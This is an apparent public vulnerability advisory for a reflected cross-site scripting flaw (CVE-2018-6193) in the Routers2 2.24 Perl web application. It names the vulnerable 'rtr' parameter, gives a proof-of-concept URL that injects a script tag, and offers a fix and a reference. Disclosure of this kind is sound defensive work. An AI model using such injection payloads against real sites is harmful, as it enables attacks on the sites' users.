1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting # Date: 18-01-18 # Vendor Homepage: http://www.steveshipway.org/software/ # Software Link: https://github.com/sshipway/routers2 # Version: 2.24 # CVE: CVE-2018-6193 # Platform: Perl # Category: webapps # Exploit Author: Lorenzo Di Fuccia # Contact: lorenzo.difuccia@gmail.com # Website: https://github.com/lorenzodifuccia 1. Description Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to <code>cgi-bin/routers2.pl</code>. 2. Proof of Concept http://router.com/cgi-bin/routers2.pl?rtr=--><script>alert("XSS")</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers 3. Solution Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the <code>routers2.conf</code>. 4. References https://github.com/sshipway/routers2/issues/1 |